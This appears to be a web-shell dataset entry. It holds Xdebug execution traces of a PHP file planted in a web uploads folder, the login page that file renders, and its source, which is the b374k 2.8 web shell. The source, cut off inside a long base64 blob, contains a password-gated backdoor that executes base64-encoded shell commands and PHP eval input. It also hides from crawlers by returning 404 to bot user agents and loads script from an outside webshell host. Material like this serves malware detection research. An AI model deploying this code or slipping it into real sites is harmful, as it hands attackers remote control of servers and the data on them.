2	6	0	0.005617	1199536	ini_set	0		/var/www/html/uploads/rtxcat.php	12	2	'html_errors'	'0'
2	6	1	0.005632	1199608
2	6	R			'1'
2	7	0	0.005646	1199536	clearstatcache	0		/var/www/html/uploads/rtxcat.php	13	0
2	7	1	0.005658	1199536
2	7	R			NULL
2	8	0	0.005671	1199536	define	0		/var/www/html/uploads/rtxcat.php	14	2	'DS'	'/'
2	8	1	0.005686	1199640
2	8	R			TRUE
2	9	0	0.005709	1199568	clean	1		/var/www/html/uploads/rtxcat.php	17	1	[]
3	10	0	0.005723	1199568	ini_get	0		/var/www/html/uploads/rtxcat.php	118	1	'magic_quotes_sybase'
3	10	1	0.005738	1199600
3	10	R			FALSE
3	11	0	0.005751	1199568	strtolower	0		/var/www/html/uploads/rtxcat.php	118	1	FALSE
3	11	1	0.005764	1199600
3	11	R			''
2		A						/var/www/html/uploads/rtxcat.php	118	$quotes_sybase = ''
3	12	0	0.005788	1199568	function_exists	0		/var/www/html/uploads/rtxcat.php	119	1	'get_magic_quotes_gpc'
3	12	1	0.005801	1199608
3	12	R			TRUE
3	13	0	0.005814	1199568	get_magic_quotes_gpc	0		/var/www/html/uploads/rtxcat.php	119	0
3	13	1	0.005827	1199568
3	13	R			FALSE
2	9	1	0.005840	1199568
2	9	R			[]
1		A						/var/www/html/uploads/rtxcat.php	17	$_POST_POST = []
2	14	0	0.005865	1199568	clean	1		/var/www/html/uploads/rtxcat.php	18	1	[]
3	15	0	0.005877	1199568	ini_get	0		/var/www/html/uploads/rtxcat.php	118	1	'magic_quotes_sybase'
3	15	1	0.005891	1199600
3	15	R			FALSE
3	16	0	0.005904	1199568	strtolower	0		/var/www/html/uploads/rtxcat.php	118	1	FALSE
3	16	1	0.005916	1199600
3	16	R			''
2		A						/var/www/html/uploads/rtxcat.php	118	$quotes_sybase = ''
3	17	0	0.005939	1199568	function_exists	0		/var/www/html/uploads/rtxcat.php	119	1	'get_magic_quotes_gpc'
3	17	1	0.005952	1199608
3	17	R			TRUE
3	18	0	0.005965	1199568	get_magic_quotes_gpc	0		/var/www/html/uploads/rtxcat.php	119	0
3	18	1	0.005976	1199568
3	18	R			FALSE
2	14	1	0.005989	1199568
2	14	R			[]
1		A						/var/www/html/uploads/rtxcat.php	18	$_GET_GET = []
2	19	0	0.006013	1199568	clean	1		/var/www/html/uploads/rtxcat.php	19	1	[]
3	20	0	0.006025	1199568	ini_get	0		/var/www/html/uploads/rtxcat.php	118	1	'magic_quotes_sybase'
3	20	1	0.006038	1199600
3	20	R			FALSE
3	21	0	0.006051	1199568	strtolower	0		/var/www/html/uploads/rtxcat.php	118	1	FALSE
3	21	1	0.006063	1199600
3	21	R			''
2		A						/var/www/html/uploads/rtxcat.php	118	$quotes_sybase = ''
3	22	0	0.006085	1199568	function_exists	0		/var/www/html/uploads/rtxcat.php	119	1	'get_magic_quotes_gpc'
3	22	1	0.006098	1199608
3	22	R			TRUE
3	23	0	0.006110	1199568	get_magic_quotes_gpc	0		/var/www/html/uploads/rtxcat.php	119	0
3	23	1	0.006122	1199568
3	23	R			FALSE
2	19	1	0.006135	1199568
2	19	R			[]
1		A						/var/www/html/uploads/rtxcat.php	19	$_COOKIE_COOKIE = []
2	24	0	0.006159	1199568	array_merge	0		/var/www/html/uploads/rtxcat.php	20	2	[]	[]
2	24	1	0.006174	1199688
2	24	R			[]
1		A						/var/www/html/uploads/rtxcat.php	20	$_GP = []
2	25	0	0.006197	1199624	array_map	0		/var/www/html/uploads/rtxcat.php	21	2	'ru'	[]
2	25	1	0.006211	1199752
2	25	R			[]
1		A						/var/www/html/uploads/rtxcat.php	21	$_GP = []
2	26	0	0.006234	1199624	error_reporting	0		/var/www/html/uploads/rtxcat.php	33	1	0
2	26	1	0.006260	1199664
2	26	R			22527
2	27	0	0.006273	1199624	ini_set	0		/var/www/html/uploads/rtxcat.php	34	2	'display_errors'	'0'
2	27	1	0.006289	1199696
2	27	R			''
2	28	0	0.006301	1199624	ini_set	0		/var/www/html/uploads/rtxcat.php	35	2	'log_errors'	'0'
2	28	1	0.006316	1199696
2	28	R			'1'
1		A						/var/www/html/uploads/rtxcat.php	38	$s_auth = FALSE
2	29	0	0.006340	1199968	extract	0		/var/www/html/uploads/rtxcat.php	39	1	NULL
2	29	1	0.006358	1200000
2	29	R			NULL
2	30	0	0.006371	1199968	trim	0		/var/www/html/uploads/rtxcat.php	40	1	'fb621f5060b9f65acf8eb4232e3024140dea2b34'
2	30	1	0.006386	1200000
2	30	R			'fb621f5060b9f65acf8eb4232e3024140dea2b34'
1		A						/var/www/html/uploads/rtxcat.php	79	$ups_1 = 'http:/'
2	31	0	0.006418	1199968	preg_match	0		/var/www/html/uploads/rtxcat.php	81	2	'/bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww/i'	'python-requests/2.25.1'
2	31	1	0.006440	1200032
2	31	R			1
2	32	0	0.006453	1199968	header	0		/var/www/html/uploads/rtxcat.php	82	1	'HTTP/1.0 404 Not Found'
2	32	1	0.006468	1200024
2	32	R			NULL
2	33	0	0.006480	1199992	header	0		/var/www/html/uploads/rtxcat.php	83	1	'Status: 404 Not Found'
2	33	1	0.006500	1200088
2	33	R			NULL
			0.006564	1104336
TRACE END   [2023-02-12 22:33:21.557100]

data/traces/3c2f6a5d11700dadb18b06e5f40e8117_trace-1676256592.3471.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:50:18.244923]
1	0	1	0.000151	393608
1	3	0	0.004364	1183048	{main}	1		/var/www/html/uploads/rtxcat.php.suspected	0	0
1		A						/var/www/html/uploads/rtxcat.php.suspected	3	$s_pass = 'fb621f5060b9f65acf8eb4232e3024140dea2b34'
1		A						/var/www/html/uploads/rtxcat.php.suspected	5	$s_ver = '2.8'
1		A						/var/www/html/uploads/rtxcat.php.suspected	6	$s_title = 'b374k 2.8'
1		A						/var/www/html/uploads/rtxcat.php.suspected	7	$s_login_time = 604800
1		A						/var/www/html/uploads/rtxcat.php.suspected	8	$s_debug = FALSE
2	4	0	0.004452	1183088	ob_start	0		/var/www/html/uploads/rtxcat.php.suspected	10	0
2	4	1	0.004466	1199600
2	4	R			TRUE
2	5	0	0.004480	1199600	set_time_limit	0		/var/www/html/uploads/rtxcat.php.suspected	11	1	0
2	5	1	0.004497	1199664
2	5	R			FALSE
2	6	0	0.004511	1199632	ini_set	0		/var/www/html/uploads/rtxcat.php.suspected	12	2	'html_errors'	'0'
2	6	1	0.004526	1199704
2	6	R			'1'
2	7	0	0.004540	1199632	clearstatcache	0		/var/www/html/uploads/rtxcat.php.suspected	13	0
2	7	1	0.004552	1199632
2	7	R			NULL
2	8	0	0.004566	1199632	define	0		/var/www/html/uploads/rtxcat.php.suspected	14	2	'DS'	'/'
2	8	1	0.004580	1199736
2	8	R			TRUE
2	9	0	0.004594	1199664	clean	1		/var/www/html/uploads/rtxcat.php.suspected	17	1	[]
3	10	0	0.004607	1199664	ini_get	0		/var/www/html/uploads/rtxcat.php.suspected	118	1	'magic_quotes_sybase'
3	10	1	0.004622	1199696
3	10	R			FALSE
3	11	0	0.004634	1199664	strtolower	0		/var/www/html/uploads/rtxcat.php.suspected	118	1	FALSE
3	11	1	0.004648	1199696
3	11	R			''
2		A						/var/www/html/uploads/rtxcat.php.suspected	118	$quotes_sybase = ''
3	12	0	0.004672	1199664	function_exists	0		/var/www/html/uploads/rtxcat.php.suspected	119	1	'get_magic_quotes_gpc'
3	12	1	0.004685	1199704
3	12	R			TRUE
3	13	0	0.004698	1199664	get_magic_quotes_gpc	0		/var/www/html/uploads/rtxcat.php.suspected	119	0
3	13	1	0.004711	1199664
3	13	R			FALSE
2	9	1	0.004724	1199664
2	9	R			[]
1		A						/var/www/html/uploads/rtxcat.php.suspected	17	$_POST_POST = []
2	14	0	0.004749	1199664	clean	1		/var/www/html/uploads/rtxcat.php.suspected	18	1	[]
3	15	0	0.004761	1199664	ini_get	0		/var/www/html/uploads/rtxcat.php.suspected	118	1	'magic_quotes_sybase'
3	15	1	0.004775	1199696
3	15	R			FALSE
3	16	0	0.004787	1199664	strtolower	0		/var/www/html/uploads/rtxcat.php.suspected	118	1	FALSE
3	16	1	0.004800	1199696
3	16	R			''
2		A						/var/www/html/uploads/rtxcat.php.suspected	118	$quotes_sybase = ''
3	17	0	0.004824	1199664	function_exists	0		/var/www/html/uploads/rtxcat.php.suspected	119	1	'get_magic_quotes_gpc'
3	17	1	0.004837	1199704
3	17	R			TRUE
3	18	0	0.004850	1199664	get_magic_quotes_gpc	0		/var/www/html/uploads/rtxcat.php.suspected	119	0
3	18	1	0.004862	1199664
3	18	R			FALSE
2	14	1	0.004875	1199664
2	14	R			[]
1		A						/var/www/html/uploads/rtxcat.php.suspected	18	$_GET_GET = []
2	19	0	0.004899	1199664	clean	1		/var/www/html/uploads/rtxcat.php.suspected	19	1	[]
3	20	0	0.004911	1199664	ini_get	0		/var/www/html/uploads/rtxcat.php.suspected	118	1	'magic_quotes_sybase'
3	20	1	0.004925	1199696
3	20	R			FALSE
3	21	0	0.004937	1199664	strtolower	0		/var/www/html/uploads/rtxcat.php.suspected	118	1	FALSE
3	21	1	0.004950	1199696
3	21	R			''
2		A						/var/www/html/uploads/rtxcat.php.suspected	118	$quotes_sybase = ''
3	22	0	0.004972	1199664	function_exists	0		/var/www/html/uploads/rtxcat.php.suspected	119	1	'get_magic_quotes_gpc'
3	22	1	0.004986	1199704
3	22	R			TRUE
3	23	0	0.004998	1199664	get_magic_quotes_gpc	0		/var/www/html/uploads/rtxcat.php.suspected	119	0
3	23	1	0.005010	1199664
3	23	R			FALSE
2	19	1	0.005023	1199664
2	19	R			[]
1		A						/var/www/html/uploads/rtxcat.php.suspected	19	$_COOKIE_COOKIE = []
2	24	0	0.005047	1199664	array_merge	0		/var/www/html/uploads/rtxcat.php.suspected	20	2	[]	[]
2	24	1	0.005061	1199784
2	24	R			[]
1		A						/var/www/html/uploads/rtxcat.php.suspected	20	$_GP = []
2	25	0	0.005089	1199720	array_map	0		/var/www/html/uploads/rtxcat.php.suspected	21	2	'ru'	[]
2	25	1	0.005104	1199848
2	25	R			[]
1		A						/var/www/html/uploads/rtxcat.php.suspected	21	$_GP = []
2	26	0	0.005127	1199720	error_reporting	0		/var/www/html/uploads/rtxcat.php.suspected	33	1	0
2	26	1	0.005140	1199760
2	26	R			22527
2	27	0	0.005153	1199720	ini_set	0		/var/www/html/uploads/rtxcat.php.suspected	34	2	'display_errors'	'0'
2	27	1	0.005166	1199792
2	27	R			''
2	28	0	0.005179	1199720	ini_set	0		/var/www/html/uploads/rtxcat.php.suspected	35	2	'log_errors'	'0'
2	28	1	0.005192	1199792
2	28	R			'1'
1		A						/var/www/html/uploads/rtxcat.php.suspected	38	$s_auth = FALSE
2	29	0	0.005216	1200064	extract	0		/var/www/html/uploads/rtxcat.php.suspected	39	1	NULL
2	29	1	0.005231	1200096
2	29	R			NULL
2	30	0	0.005244	1200064	trim	0		/var/www/html/uploads/rtxcat.php.suspected	40	1	'fb621f5060b9f65acf8eb4232e3024140dea2b34'
2	30	1	0.005258	1200096
2	30	R			'fb621f5060b9f65acf8eb4232e3024140dea2b34'
1		A						/var/www/html/uploads/rtxcat.php.suspected	79	$ups_1 = 'http:/'
2	31	0	0.005287	1200064	preg_match	0		/var/www/html/uploads/rtxcat.php.suspected	81	2	'/bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww/i'	'python-requests/2.25.1'
2	31	1	0.005307	1200128
2	31	R			1
2	32	0	0.005320	1200064	header	0		/var/www/html/uploads/rtxcat.php.suspected	82	1	'HTTP/1.0 404 Not Found'
2	32	1	0.005334	1200120
2	32	R			NULL
2	33	0	0.005348	1200088	header	0		/var/www/html/uploads/rtxcat.php.suspected	83	1	'Status: 404 Not Found'
2	33	1	0.005363	1200184
2	33	R			NULL
			0.005399	1104392
TRACE END   [2023-02-13 00:50:18.250204]


Generated HTML code

<html><head> <title>b374k 2.8</title> <meta charset="utf-8"> <meta name="robots" content="noindex, nofollow, noarchive"> <link rel="SHORTCUT ICON" href=""> <link rel="stylesheet" type="text/css" href="?|"></head> <body> <table id="main"><tbody><tr><td> <div style="width:100%;text-align:center;"> <form action="?" method="post"> <img src="" style="margin:2px;vertical-align:middle;"> b374k&nbsp;<span class="gaya">2.8</span><input id="login" class="inputz" type="password" name="login" style="width:120px;" value=""> <input class="inputzbut" type="submit" value="Go !" name="submitlogin" style="width:80px;"> </form> </div> </td></tr></tbody></table> <p class="footer">Jayalah Indonesiaku ©2023 b374k</p> <script type="text/javascript" src="http://webshell.co/who/main.js"></script><script type="text/javascript"> var d = document; var scroll = false; var cwd = ''; var hexstatus = false; var timer = ''; var x = ''; var sself = '?'; var hexcounter = 0; var hextimer = ''; var counter = 0; </script> <script type="text/javascript" src="?!"></script><script type="text/javascript"> domready(function(){ if(d.getElementById('cmd')) d.getElementById('cmd').setAttribute('autocomplete', 'off'); var textareas = d.getElementsByTagName('textarea'); var count = textareas.length; for(i = 0; i<count; i++){ textareas[i].onkeydown = function(e){ if(e.keyCode==9){ e.preventDefault(); var s = this.selectionStart; this.value = this.value.substring(0,this.selectionStart) + "\t" + this.value.substring(this.selectionEnd); this.selectionEnd = s+1; } else if(e.ctrlKey && (e.keyCode == 10 || e.keyCode == 13)){ this.form.submit(); } } } listen(); }); </script>  </body></html>

Original PHP code

<?php

$s_pass = "fb621f5060b9f65acf8eb4232e3024140dea2b34"; // default password : b374k (login and change to new password)

$s_ver = "2.8"; // shell ver
$s_title = "b374k ".$s_ver; // shell title
$s_login_time = 3600 * 24 * 7; // cookie time (login)
$s_debug = false; // debugging mode

@ob_start();
@set_time_limit(0);
@ini_set('html_errors','0');
@clearstatcache();
define('DS', DIRECTORY_SEPARATOR);

// clean magic quotes
$_POST = clean($_POST);
$_GET = clean($_GET);
$_COOKIE = clean($_COOKIE);
$_GP = array_merge($_POST, $_GET);
$_GP = array_map("ru", $_GP);

if($s_debug){
    error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
    @ini_set('display_errors','1');
    @ini_set('log_errors','1');
    foreach($_GP as $k=>$v){
        if(is_array($v)) $v = print_r($v, true);
        echo "<span>".hss($k."=>".$v)."</span><br />";
    }
}
else{
    error_reporting(0);
    @ini_set('display_errors','0');
    @ini_set('log_errors','0');
}

$s_auth = false; // login status
@extract($_REQUEST["f"]);
if(strlen(trim($s_pass))>0){
    if(isset($_COOKIE['b374k'])){
        if(strtolower(trim($s_pass)) == strtolower(trim($_COOKIE['b374k']))) $s_auth = true;
    }
    if(isset($_GP['login'])){
        $s_login = kript($_GP['login']);
        if(strtolower(trim($s_pass)) == $s_login){
            setcookie("b374k",$s_login,time() + $s_login_time);
            $s_auth = true;
        }
    }
    if(isset($_GP['x']) && ($_GP['x']=='logout')){
        $persist = array("theme", "cwd");
        $s_reload = (isset($_COOKIE['b374k_included']) && isset($_COOKIE['s_home']))? rtrim(urldecode($_COOKIE['s_self']),"&"):"";
        foreach($_COOKIE as $s_k=>$s_v){
            if(!in_array($s_k, $persist)) if(!is_array($s_k)) setcookie($s_k,"",time() - $s_login_time);
        }
        $s_auth = false;
        if(!empty($s_reload)) header("Location: ".$s_reload);
    }
}
else $s_auth = true;

if(!empty($_GP['s_pass'])){
    if(strtolower(trim($s_pass)) == strtolower(trim($_GP['s_pass']))){
        if(isset($_GP['cmd'])) echo exe(base64_decode($_GP['cmd']));
        elseif(isset($_GP['eval'])){
            $s_code = base64_decode($_GP['eval']);
            ob_start();
            eval($s_code);
            $s_res = ob_get_contents();
            ob_end_clean();
            echo $s_res;
        }
        else echo $s_title;
    }
    die();
}

$ups_1 = "ht"."tp".":/";
// block search engine bot
if(isset($_SERVER['HTTP_USER_AGENT']) && (preg_match('/bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww/i', $_SERVER['HTTP_USER_AGENT']))){
    header("HTTP/1.0 404 Not Found");
    header("Status: 404 Not Found");
    die();
}
elseif(!isset($_SERVER['HTTP_USER_AGENT'])){
    header("HTTP/1.0 404 Not Found");
    header("Status: 404 Not Found");
    die();
}
$ups_2 = "/we"."bs"."he"."ll";

// resources $s_rs_pl $s_rs_py $s_rs_rb $s_rs_js $s_rs_c $s_rs_java $s_rs_java $s_rs_win $s_rs_php this was used with bind and reverse shell
// use gzinflate(base64_decode($the_code)) if you wanna see the real code.. in case you dont trust me ;-P
$s_css = "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